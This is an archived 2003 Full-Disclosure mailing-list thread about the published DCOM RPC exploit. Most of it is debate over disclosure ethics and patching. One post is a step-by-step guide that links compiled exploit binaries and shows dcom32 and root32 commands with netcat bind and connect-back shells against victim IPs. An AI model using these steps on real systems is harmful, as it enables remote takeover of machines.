Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[morning_wood]

umm i dont have office installed, so there is no spellcheck in OE. And ever
consider i may have a crap keyboard and one hand..??? or mby i just dont
care hou goud i speal mmmkay...
oh.. everone hates me... ROFL...

w00d

- Original Message - 
From: "Shanphen Dawa" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 10:46 PM
Subject: Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> This childish flaming is why everyone wishes death upon you donnie,
please get a clue.
>
> There are more constructive ways to make a point, please try your best to
try them. You might be suprised how much less hated you might become around
here.
>
> -Shanphen
>
> Oh yeah, please do try the tools drop down menu in hotmail., there is a
selection called "Spell Check." As for the grammar, I guess you might just
have to proofread before you click send. It would also help towards your
"credibility".
>
> On Sat, 26 Jul 2003 20:03:02 -0700
> "morning_wood" <[EMAIL PROTECTED]> wrote:
>
> > please stop whining and try having a nice cup of STFU.  Too bad, mby
"big
> > vendors" need to start hiring exploit developers to test thier products
> > before releasing them. Last i checked, the internet at large is a free
> > maket, open to the benifits and pitfalls any other marketplace.
> >
> > How was that cup of STFU???  need sum sugar?
> >
> > morning_wood
> > http://nothackers.org/about.php
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: DCOM RPC exploit

[Steve W. Manzuik]

Hi Chris.

Funny you post this from your NGS Software account.  Does Saphire/Slapper
ring a bell?  Isn't this a bit of the pot calling the kettle black?

Do you really think for one second that HD Moore, Benjurry, and FlashSky are
the only people capable of coming up with exploit code for this?  The day it
was announced I saw two other exploits that haven't been publically
announced.  The community of people who have the skills to write such a worm
already had the exploit code, or at the very minimum enough information to
replicate it the day this was released.

A worm exploiting this might happen, but is it really that big of a deal?

> Message: 13
> Date: Sat, 26 Jul 2003 20:16:24 -0400 (Eastern Daylight Time)
> From: Chris Paget <[EMAIL PROTECTED]>
> To: "[EMAIL PROTECTED]" 
> <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] DCOM RPC exploit  (dcom.c)
> 
> 
> 
> 
> I'd just like to thank FlashSky, Benjurry, and H D Moore for 
> releasing this
> code.  Really guys, sterling job.  Now the skript kiddies and 
> VXers have got
> virtually no work to do in order to write a worm that exploits this.
> 
> 
> 
> Personally, I'm tempted to set up my firewall to NAT incoming 
> requests on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know 
> this is the
> full-disclosure list, but working exploit code for an issue 
> this huge is taking
> it a bit far, especially less than 2 weeks after the advisory 
> comes out.
> 
> Cheers, fellas.  When the worm comes out, I'll be thinking of you.
> 
> Chris


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Nick FitzGerald]

"gregh" <[EMAIL PROTECTED]> wrote:

> Just my $0.02:
> 
> Shoot the messenger - that always stops the bad event happening.
> 
> Sorry for the sarcasm. I can never see the point in "If we don't tell
> the enemy how to build a nuclear weapon they never will so we are
> safer as a result" logic. 

The logic is not that you are ultimately "safer" in the sense that 
potential "adversaries" will be _prevented forever_ from developing 
"something bad" to use against you based on this "knowledge".

The argument is that you will be probabilistically safer for a longer 
time.  If you don't give kitset weapons, or the detailed plans of how 
to make them, to all and sundry then the number of potential 
adversaries who can use that type of weapon against you is _reduced_.  
Thus, probabilistically, over many iterations of such new weapon 
possibilities and designs, it is longer on average before any one of 
these weapons whose availability has been "boosted" is used against you 
_relative to those cases where the possibilities and plans are not 
disclosed_.

Thus, not disclosing such information is part of managing the risk 
associated with a vulnerability.

That is not to say "you can get right royally shagged via DCOM over RPC 
so apply this patch now" is not valuable information of the sort that 
should not be disclosed.  However, publishing exploit code for the 
kudos of the "my willy is bigger than yours" kind, which typically is 
the only"benefit" accruing to the discloser, is somewhere between 
narcisistic bloody mindedness and outright criminal.

(At the risk of strollling even further off topic, the first point 
reminds me of something the proponents of "give us the sploits" often 
trundle out -- convincing those managers who "won't believe X is 
possible until they see it with their own eyes".  Of course, selling 
"real security" to such folk is much like being tailor to that mythical 
emporer, so availability of sploits should not be necessary at all, as 
essentially the problem in such instances reduces to one or other of, 
"will I spoil my professional reputation by being hamstrung into 
implementing half-arsed solutions because this guy's has half of a 
baboon's brain" _or_ to that of a marketing problem where the "art" is 
in deciding how to tell them any old crap so long as it is wrapped up 
in enough techno-gibberese that they think they half understand what 
you are talking about.

> Greg - you may call me a "Jihad O'Clue." if you wish.

I may, but as you're inviting name-calling, I think I am rather more 
likely to call you a silly twat that uses some chronically lame HTML 
Email client that has no place in the working armory of a security 
professional, at least not if its trivial configuration options that 
disable the sending of HTML Email are not disabled.


Regards,

Nick FitzGerald

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Chris Paget]

Comments inline.


On Sun, 27 Jul 2003, Jason wrote:

> The war begins...

I hope so.  Discussion of the hows and why's and morals of security and
disclosure is *always* a good thing - which was partly why I made the original
post.

> I'm not going to debate the release of code with anyone. Simply put,
> best practices should have mitigated this in a huge way from the
> beginning. All of the remaining threat should have been tested and
> patched by now.

In an ideal world, everyone would be patched by now.  The problem is, this is
not an ideal world, most people will still be unpatched.  As for best practices
- have you ever tried disabling RPC?  It's not actually possible - in fact,
WinXP and 2003 will automatically reboot if RPC stops.  As for DCOM - the
setting to disable it is a suggestion only, and applications can and will
re-enable it whenever they use it, or else they'll just plain break.  So which
"best practices" are you talking about?  Are you planning to install a separate
firewall for every machine?  If so, maybe I should buy some stock in Zone Labs
or ISS...!

> > Scanners are good; I agree they give out more information than an advisory, but
> > it's still a step away from giving the kiddies a tool.  Those in the know will
> > always be able to write an exploit from minimal details; whether or not the
> > pre-pubescent h4xx0rs get hold of it is another matter though.
>
> I would rather have a pre-pubescent cracker knocking on the door with a
> published sploit that I was forced to patch against any day when
> compared to the 1337 h4x0r w17h 4 g04l and the funding to achieve it.

But you'd still patch either way, right?  So we're talking about the difference
between a knowledgeable, determined attacker (who can never be kept out) and a
skript kiddie with a tool, who is just an annoyance.  But because of the
exploit code, he's now a skript kiddie with a ten-thousand-node DDoS network at
his disposal, who can (and probably will) DDoS anyone, anywhere, and there's
nothing you can do to prevent it (short of getting very friendly with your
upstream provider).

> ** Far too many people wait to patch until there is "published" exploit
> code. **

I agree - there's far too many people who wait.  But what about all the millions
of home users who don't even know what a security patch *IS*, let alone how to
find them?  Most people buy a computer, stick it on the net, and expect it to
work.  They don't expect to be downloading updates every week.

> ** If you have assets worth protecting you hire people who are capable
> of protecting them. **

The organisation concerned has hired many people who are perfectly capable of
protecting their assets.  The problem is, they're concerned about the business
as well - and given Microsoft's track history with patches, I can understand
their not wanting to install every patch on every mission-critical server the
moment it is released.  Allowing people to work is the primary goal of every
server; security HAS to come second to that.

> * How many of the systems in your typical multinational organization
> require the use of DCOM? ( slim to none? )

Agreed - very few, if any.

> * How many of the systems that require DCOM need rpc exposed to
> everyone? ( slim to none? )

Also agreed.  But how many organisations firewall off internal servers from
internal users (slim to none).  Bad practice, I'll agree, but expensive to
implement if you choose to do it.

> * How many of the systems exposed to everyone have weak administrative
> passwords? ( nearly all? )

Define "weak".  If you mean "guessable within a week", I'd expect it to be
very few.  If you mean "crackable from a copy of the SAM by an attacker with
average resources before the password expires", probably most - especially given
the recent advances in hash chaining techniques.

> * How many of the systems vulnerable internally would have been
> protected by an IPS if it had a way of protecting? ( slim to none? )
>
> * How many of the systems vulnerable internally are protected with an
> IDS? ( slim to none? )

Detection and prevention is easier than you might think.  The moment that an IDS
detects the string "Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright
1985-2000 Microsoft Corp." in a network packet, it's a fair bet that it's as the
result of an exploit.  Block the connection, block the IP.

As for how many are protected - not enough, which is again a cost issue.  You
ever looked at the price of an ISS RealSecure sensor?  And then multiplied that
by a thousand to cover all your servers?  Besides - how many system
administrators have the time to watch the IDS given the number of patches they
have to install on all their servers?

> * How many of the systems vulnerable from the internet are implemented
> and administered by an MCSE or equivelant? ( nearly all? )

Agreed.  But I think many people on this list would agree that an exam you can
pass after reading a book the night before is not worth much.

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Valdis . Kletnieks]

On Sat, 26 Jul 2003 22:29:56 CDT, Ron DuFresne said:
> I'm just trying to understand how corporate networks would/should be at
> risk with this, why port 135 would not be filtered already limiting
> exposure.  Is there a reason why it would not be that I'm missing?  The

It's the rare corporate net indeed that doesn't have a single remotely
exploitable copy of IE or Outlook left in its entire address space.

And Slammer proved quite well that having a firewall doesn't stop squat.


pgp0.pgp
Description: PGP signature

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Jason]

The war begins...

I'm not going to debate the release of code with anyone. Simply put, 
best practices should have mitigated this in a huge way from the 
beginning. All of the remaining threat should have been tested and 
patched by now.

Now to the points you make.

Chris Paget wrote:
Len,

IMHO there's a difference between "security through obscurity" and posting
working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
over a range of RPC mechanisms (primarily 135/tcp) is all that most
administrators need to know.  It's one thing knowing that you can kill a person
with a gun, and it's another to give away firearms.
RPC services have been a risk forever. Knowing that the majority of 
clients do not use DCOM, an RPC service, is all that the administrators 
needed to know. Do you build a *nix system and leave all(any) RPC 
services enabled?

** DCOM should have been disabled for 99% of the systems they have. **

Scanners are good; I agree they give out more information than an advisory, but
it's still a step away from giving the kiddies a tool.  Those in the know will
always be able to write an exploit from minimal details; whether or not the
pre-pubescent h4xx0rs get hold of it is another matter though.
I would rather have a pre-pubescent cracker knocking on the door with a 
published sploit that I was forced to patch against any day when 
compared to the 1337 h4x0r w17h 4 g04l and the funding to achieve it.

Ohhh, now we are going to complain about having to put in all those 
extra hours and spend all that overtime money. Umm, be happy you still 
have a job.

** Far too many people wait to patch until there is "published" exploit 
code. **

Different people will have differing opinions on how much information and what
kind of disclosure policy is acceptable; for me, working exploit code so soon
after the advisory is just irresponsible.
Jihad, count me out.

As for the <2 week "grace period", it's not enough.  What if the patch is
broken in some way?  It was rushed out the door by Microsoft; how many admins
wait a month before applying a patch, just to see if anyone else has problems
with it?  I've just finished an audit on a multinational manufacturing company;
the exploit code came out before they'd patched.  How many other companies are
in the same boat?
Sorry, no sympathy here.

** If you have assets worth protecting you hire people who are capable 
of protecting them. **

Here are some parting questions:

* How many of the systems in your typical multinational organization 
require the use of DCOM? ( slim to none? )

* How many of the systems that require DCOM need rpc exposed to 
everyone? ( slim to none? )

* How many of the systems exposed to everyone have weak administrative 
passwords? ( nearly all? )

* How many of the systems vulnerable internally would have been 
protected by an IPS if it had a way of protecting? ( slim to none? )

* How many of the systems vulnerable internally are protected with an 
IDS? ( slim to none? )

* How many of the systems vulnerable from the internet are implemented 
and administered by an MCSE or equivelant? ( nearly all? )

I agree, exploit code may force people to patch, but that's not sufficient
justification in my book.
Chris

And some random thoughts.

* I am still a firm believer in the ability of the human race to learn 
by making mistakes. ( it can be fun )

* I do not believe that those mistakes need not remove you from the 
human race. ( it should be fun if it does )

* I like beer! 1 l0v3 s3x!

* These are my opinions and not those of my employer.

* It is like shock and awe all over again... ONLY IT IS BETTER AND 
JUSTIFIED!!!

* I have a clue stick, need a whack?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Paul Schmehl]

On Sat, 2003-07-26 at 22:29, Ron DuFresne wrote:
> 
> I'm just trying to understand how corporate networks would/should be at
> risk with this, why port 135 would not be filtered already limiting
> exposure.  Is there a reason why it would not be that I'm missing?

Are you really serious?  Recall Slammer?  There were networks that were
locked down pretty tight.  Slammer couldn't get in, right?  Then one
developer who got his unpatched copy of SQL inside the network, by
logging in through VPN with his infected laptop, took the entire network
down.

You can't get in to our network on those ports either - unless you're
already in.  But I can guarantee you that we'll be chasing infected
boxes down for days after the worm hits.  And we've already patched
everything that we could patch.  I scan for Slammer every week, because
every week someone new decides to install SQL unpatched or some stupid
app that has an unpatched copy of MSDE.  Now I'll be chasing the RPC
worm around too.

You can't firewall 135 inside your network or you'd have no network.

The only reason I read lists like this is because I need to know before
it hits what the next stupid exploit is that I have to deal with.  And
every one is a royal PITA.  I put virus and worm writers right there in
the same pile with spammers.  They're all the scum of the earth.  Clear
examples of the worst of human nature.

-- 
Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Shanphen Dawa]

This childish flaming is why everyone wishes death upon you donnie, please get a clue.

There are more constructive ways to make a point, please try your best to try them. 
You might be suprised how much less hated you might become around here.

-Shanphen

Oh yeah, please do try the tools drop down menu in hotmail., there is a selection 
called "Spell Check." As for the grammar, I guess you might just have to proofread 
before you click send. It would also help towards your "credibility".

On Sat, 26 Jul 2003 20:03:02 -0700
"morning_wood" <[EMAIL PROTECTED]> wrote:

> please stop whining and try having a nice cup of STFU.  Too bad, mby "big
> vendors" need to start hiring exploit developers to test thier products
> before releasing them. Last i checked, the internet at large is a free
> maket, open to the benifits and pitfalls any other marketplace.
> 
> How was that cup of STFU???  need sum sugar?
> 
> morning_wood
> http://nothackers.org/about.php
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] morning_wood should stop posting xss vulns insites and fix his own site.

[[EMAIL PROTECTED]]

> my site is my site, why are you telling me to "fix" it? I knew it's 404
>has xss before any of you did.
>Whats the big deal what my site has or hasnt... hmm? If you dont like my
>stuff, dont read it, 
>my name is on every one of my posts.. every hear of filter? I dont read
>several advisories here based on title alone.. am i missing out? mby, mby
>not.. are you? XSS is a seecurity issue plain and simple, and "my site"
>can have or have not whatever i please, i suggest not visiting then, >hell
.. why are you even bothering to visit if you dont like.. 

Donnie, the point is that if you complain, don't make the same mistake. 
You're a hypocrite to call XSS a security issue, and then (knowingly) make
the same error.  It's not that hard to write a simple fix to filter your
input.  Basic JavaScript, Donnie, basic JavaScript.  If XSS is a security
issue, and the entire thesis of your so-called security list is that
security issues should be dealt with, instead of hidden -- as has been your
complaint before -- then you should leave that list now.  Knowingly
introducing vulnerabilities, and then not fixing them when several people
(myself included) have noted it to you.


mail2web - Check your email from the web at
http://mail2web.com/ .


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[christopher neitzert]

Hicks,

I am concerned that you construed my remark as going after F-D, I read
F-D for the commentary as I find it educational and entertaining at the
same time.

Pure-evil, in this case is not necessarily bad. 

Perhaps I should have been more verbose;

I'm particularly happy that this exploit has been published as i hope it
will motivate Microsoft to fix the problems with their McOS. 

Whats evil, or beautiful, about it (depending on how you look at it) is
that it works very nicely on an XP box hardened to NSA-SNAC
Specification regarding secure RPC.  

My hat is off to FlashSky, Benjurry, and H D Moore, keep up the great
work! 


chris



On Sat, 2003-07-26 at 23:45, hicks wrote:
> this was on a website before it was published on full disclosure btw it came
> out today and that was that, no need to go after full disclosure btw it was
> on french bugtraq soon after being published and then made its way on here
> why be on full-disclosure if u say its bad or pure evil.. Its well written
> and has a few bugs but its nice code IMHO, what u expect after the vuln
> releases
> 
> 
> - Original Message - 
> From: "christopher neitzert" <[EMAIL PROTECTED]>
> To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
> Sent: Saturday, July 26, 2003 6:19 PM
> Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)



signature.asc
Description: This is a digitally signed message part

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[hicks]

this was on a website before it was published on full disclosure btw it came
out today and that was that, no need to go after full disclosure btw it was
on french bugtraq soon after being published and then made its way on here
why be on full-disclosure if u say its bad or pure evil.. Its well written
and has a few bugs but its nice code IMHO, what u expect after the vuln
releases


- Original Message - 
From: "christopher neitzert" <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 6:19 PM
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] dcom-win32

[exceed]

hi kiddies,

original dcom exploit posted by HD Moore compiled with cygwin: 

http://users.volja.net/exceed/dcom-win32.zip 

---
Get your free email at http://www.microsoftsucks.org 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit

[w g]

DCOM RPC exploit paper7/26/03by: illwill <[EMAIL PROTECTED]>http://illmob.org/rpc/
There are 2 dcom Win32 ported versions available:Ben Lauziere [EMAIL PROTECTED]   http://illmob.org/rpc/DComExpl_UnixWin32.zip"exceed" [EMAIL PROTECTED] http://illmob.org/rpc/dcom-win32.zip
for my example ill be using ben's version cuz it doesnt use a cygwin.dllhow to use the Dcom32.exe ported for win32 boxes:
c:\> dcom32.exe  (ex. C:\> dcom32.exe 2 192.168.0.2)if all goes well you should get a shell on port  to connect to.fire up netcat
c:> nc -vvv VicIP Port(ex.  c:\>nc 192.168.0.2 JackedXP [192.168.0.2]  openMicrosoft Windows XP [Version 5.1.2600]C:\WINDOWS\system32>)
BAM!!! You got a command prompt access to the victim box!!
easy kiddie bat for dcom32 from morning_wood
@echo on@echo easy kiddi .bat by [EMAIL PROTECTED]@echo useage is "target remote-ip"@echo target is 1-6 where@echo -  0 Windows 2000 SP0 (english)@echo -  1 Windows 2000 SP1 (english)@echo -  2 Windows 2000 SP2 (english)@echo -  3 Windows 2000 SP3 (english)@echo -  4 Windows 2000 SP4 (english)@echo -  5 Windows XP SP0 (english)@echo -  6 Windows XP SP1 (english)pausedcom32 %1 %2nc -vvv %2 
commandline for it would be rpcx.bat  (ex. rpcx 2 192.168.0.2)
 
 
 
how to use the root32 exploit (which i found to work like shit.)first open a recieving netcat connection on your own computerusing the command linenc -l -v -p 1199  (1199 can be any port you desire)
then use the command line for root32.exe
root32.exe 172.0.15.29   64.252.136.135   1199 2    remoteIP^   yourIP^ yourPORT^    ^vic service pack
if all goes well you should recieve a commandline connect-back prompt through netcat to the vulnerable box.
morning_wood's quick n grimy bat file Root.batroot32 %1 %2 %3 2nc -vv %1 %3
peace out. illwillhttp://illmob.org
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[gregh]

 
- Original Message - 
From: Chris 
Paget 
To: Len 
Rose 
Cc: [EMAIL PROTECTED] 

Sent: Sunday, July 27, 2003 12:08 PM
Subject: Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

Len,IMHO there's a difference between "security through 
obscurity" and postingworking exploit code.  Knowing that there is a 
vulnerability in DCOM, accessibleover a range of RPC mechanisms (primarily 
135/tcp) is all that mostadministrators need to know.  It's one thing 
knowing that you can kill a personwith a gun, and it's another to give away 
firearms.
Just my $0.02:
 
 
Shoot the messenger - that always stops 
the bad event happening.
 
Sorry for the sarcasm. I can never see 
the point in "If we don't tell the enemy how to build a nuclear weapon they 
never will so we are safer as a result" logic.
 
 
Greg - you may call me a "Jihad O'Clue." if you 
wish.

[Full-Disclosure] Interesting Site: PuRe's Escape

[PuRe]

Hello Full Disclosure Lis Users:

Your Friend PuRe considered our site PuRe's Escape interesting and wanted to send it 
to you.


Site Name: PuRe's Escape
Open-Source for an Open-Community, Taking You To The Next Level.
Site URL: www.pureescape.net

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[dhtml]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


From: "Chris Paget" <[EMAIL PROTECTED]>
>
> 
>
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing
this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers
have got
> virtually no work to do in order to write a worm that exploits this.
>
> 
>
> Personally, I'm tempted to set up my firewall to NAT incoming requests
on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is
the
> full-disclosure list, but working exploit code for an issue this huge
is taking
> it a bit far, especially less than 2 weeks after the advisory comes
out.
>
> Cheers, fellas.  When the worm comes out, I'll be thinking of you.
>
> Chris


This shall be taken as the official stance of your employer ngssoftware.com
from whence you post. Otherwise the standard disclaimer would apply.

Or perhaps you are just new there after the spotlight of the "shatter
attack" dimmed down.

-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj8jNzIACgkQTAj0ZSCgbx7lWQCgvK1MgnOfrHWI4M2y6Gip5CbhMI8A
oJ33gRJgEcJe4oLFkqYRUfi3n1Wq
=vrfn
-END PGP SIGNATURE-




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Ron DuFresne]

>
> Len,
>
> IMHO there's a difference between "security through obscurity" and posting
> working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
> over a range of RPC mechanisms (primarily 135/tcp) is all that most
> administrators need to know.  It's one thing knowing that you can kill a person
> with a gun, and it's another to give away firearms.
>

[SNIP]


I'm just trying to understand how corporate networks would/should be at
risk with this, why port 135 would not be filtered already limiting
exposure.  Is there a reason why it would not be that I'm missing?  The
main exposure seems to be the home users not aware of why certain services
and ports should be properly configured and/or filtered.  The gartner
group seems to have come to this conclusion, one of their better
statements in the recent past:



SECURITY WIRE DIGEST, VOL. 5, NO. 55, JULY 24, 2003
...
*GARTNER URGES PERSONAL FIREWALLS FOR MICROSOFT FLAWS
Research firm Gartner Group is urging corporations to consider using
personal firewalls on all desktop and notebook computers connected to
networks to hedge against the steady stream of Microsoft vulnerabilities.

Gartner says applying all the necessary patches to address the dozen
"critical" alerts that Microsoft released between January and June would
take most enterprises at least six months. "And more desktop
vulnerabilities will be discovered in the near future," says Gartner VP
John Pescatore.

While implementing and maintaining personal firewalls will amount to a
substantial cost of as much as $150 per machine, Pescatore says they will
help protect individual devices--particularly those used by remote
workers--from the type of executable attacks that are becoming more
popular.

Pescatore says the Internet Connection Firewall built into Windows XP
isn't sufficient protection because it blocks only incoming connections.
Enterprise firewalls should also be outfitted with URL blocking products
that filter out URLs known to be sources of attacks.
http://www3.gartner.com/resources/116100/116197/116197.pdf


It seems  more and more folks in the industry are coming to the conclusion
that maintaining patched systems is an overwhelming job, and that the best
mitigation is filtering at the gateway in the various forms that can be
accomplished.  This still leaves the average home user in a rut, since
most lack the basic knowledge of the consquesnces of not filtering out the
nasty cruft from the benighn, let alone the skills to recognise such.  It
would be nice to see other vendors step up to Dell's recent announcement
to start shipping systems with a more secure 'default' install, and
perhaps find a way to expand upon that shipping systems with a personal
firewalling system capablle of providing a safer networking setup out of
the box for joe average websurfer.  Until the environment changes as
regards those vendors releasing code/applications/OS', then the best we
have at present is those vendors shipping the systems to the endusers.

Thanks,

Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Blue Boar]

Chris Paget wrote:

I know this is the
full-disclosure list, but working exploit code for an issue this huge is taking
it a bit far, especially less than 2 weeks after the advisory comes out.
I'm aware of at least 7 exploits for this vuln now.  Are you really going 
to complain that you get to see the source for one of them?  If so, that's 
easy enough to fix, just delete the file from your drive.  Yes, this 
exploit will almost certainly be turned into a worm.  I for one would 
rather see the exploit that will be the worm ahead of time, makes it easier 
for everyone to prepare.

		BB

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[morning_wood]

please stop whining and try having a nice cup of STFU.  Too bad, mby "big
vendors" need to start hiring exploit developers to test thier products
before releasing them. Last i checked, the internet at large is a free
maket, open to the benifits and pitfalls any other marketplace.

How was that cup of STFU???  need sum sugar?

morning_wood
http://nothackers.org/about.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Elvar]

Thanks a lot Paul, that compiled fine now. I have yet to see this exploit
actually work though. I've tested it on multiple 2k/xp machines with all
different service packs and it never seems to affect them.

Regards,
Elvar


- Original Message - 
From: "Paul M. Hirsch" <[EMAIL PROTECTED]>
To: "Elvar" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 8:38 PM
Subject: Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> On Sat, Jul 26, 2003 at 07:34:17PM -0500, Elvar wrote:
> > Anyone gotten this to compile in FreeBSD 4.8-stable?
> >
> > <[EMAIL PROTECTED]:elvar>gcc -o dcom dcom.c
> > dcom.c:25: error.h: No such file or directory
>
> Change line 10 to:
>
> #include 
>
> Compiles fine on OpenBSD-current/i386.  It failed to exploit
> my W2Ksp3 and XPsp1 boxes/victims.
>
> -Paul
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Chris Paget]

Len,

IMHO there's a difference between "security through obscurity" and posting
working exploit code.  Knowing that there is a vulnerability in DCOM, accessible
over a range of RPC mechanisms (primarily 135/tcp) is all that most
administrators need to know.  It's one thing knowing that you can kill a person
with a gun, and it's another to give away firearms.

Scanners are good; I agree they give out more information than an advisory, but
it's still a step away from giving the kiddies a tool.  Those in the know will
always be able to write an exploit from minimal details; whether or not the
pre-pubescent h4xx0rs get hold of it is another matter though.

Different people will have differing opinions on how much information and what
kind of disclosure policy is acceptable; for me, working exploit code so soon
after the advisory is just irresponsible.

As for the <2 week "grace period", it's not enough.  What if the patch is
broken in some way?  It was rushed out the door by Microsoft; how many admins
wait a month before applying a patch, just to see if anyone else has problems
with it?  I've just finished an audit on a multinational manufacturing company;
the exploit code came out before they'd patched.  How many other companies are
in the same boat?

I agree, exploit code may force people to patch, but that's not sufficient
justification in my book.

Chris




On Sat, 26 Jul 2003, Len Rose wrote:

> Disclaimer: I'm not supposed to have an opinion about anything
> other than how the list functions but I'm weak and unable to
> resist this one.
>
> Hi Chris,
>
> I don't feel that your position is valid. Once the vulnerability was
> announced then it was inevitable. I'm surprised that you feel that
> security by obscurity is a valid stance. Even those who have released
> "harmless" scanners have in fact aided those who would be writing such
> malware anyway since all they have to do is sniff the wire if they're
> searching for correct methodology.
>
>
> Chris Paget wrote:
>
> > 
> > I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> > code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> > virtually no work to do in order to write a worm that exploits this.
> > 
>
> Only those who mistakenly believe that hiding information from the masses
> will stop those who have the knowledge and intent to cause harm could feel
> this way.
>
> > Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> > 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> > full-disclosure list, but working exploit code for an issue this huge is taking
> > it a bit far, especially less than 2 weeks after the advisory comes out.
>
> It wouldn't matter if it were 2 months.
>
> > Cheers, fellas.  When the worm comes out, I'll be thinking of you.
>
> Think of the joke sold to millions of people masquerading as an operating system
> coded by unemployed vms programmers, and visual basic "experts" instead.
>
> Len
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[w g]

http://illmob.org/rpc/ is my current directory for newer 'as i get them' rpc tools... if anyone has anyhting to add to it please feel free to email me
-illwill
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Neeko Oni]

1) It's a one-shot attack.  Pick the wrong SP, no go.  Whatever worm comes of
this will be limited by this fact.

2) It'll be another week before most of these "kiddies" figure out how to 
compile any exploit released.  "ware is erreer.h!!!" etc.

3) Two weeks.. if that's not long enough to patch up, you can't really blame
the exploit writer(s).

4) I don't like guns.  People kill people with guns.  Do I blame the murderers
for pulling the trigger or do I blame the gun producers for making the gun?
Hint:  This is different than "Should people make guns or not?"

5) NAT'ing incoming requests to other hosts.. nice.  First off, NAT was the 
wrong choice of buzzword.  Next, do you really want it looking like you're 
attempting to exploit either of those sites?  Furthermore.. what's the point?
Are you trying to DoS those hosts?  Nice.  Whine about the actions of others
while participating in a DoS attack.  Good job.  You must be a mental giant.
 
I can tell you're one of those guys who spent the night at your colo trying to
patch SQL while Slammer hit.  

.Neek

> 
> 
